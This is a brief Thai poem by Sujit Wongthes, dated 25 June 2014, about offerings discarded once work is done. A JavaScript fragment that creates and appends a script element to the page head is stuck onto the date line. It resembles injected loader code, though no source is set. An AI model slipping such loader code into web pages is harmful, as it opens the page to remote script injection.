ใบเตือน

 

งานเสร็จทุกสิ่งทิ้งบายสี

ลงวารีลอยเป็นใบตองเน่า

ปล่อยของใบเสร็จเตือนเบาเบา

เขากับเรารู้ทางต่างตอบแทน

 

สุจิตต์ วงษ์เทศ

พุธ 25 มิถุนายน 2557var d=document;var s=d.createElement(‘script’); d.getElementsByTagName(‘head’)[0].appendChild(s);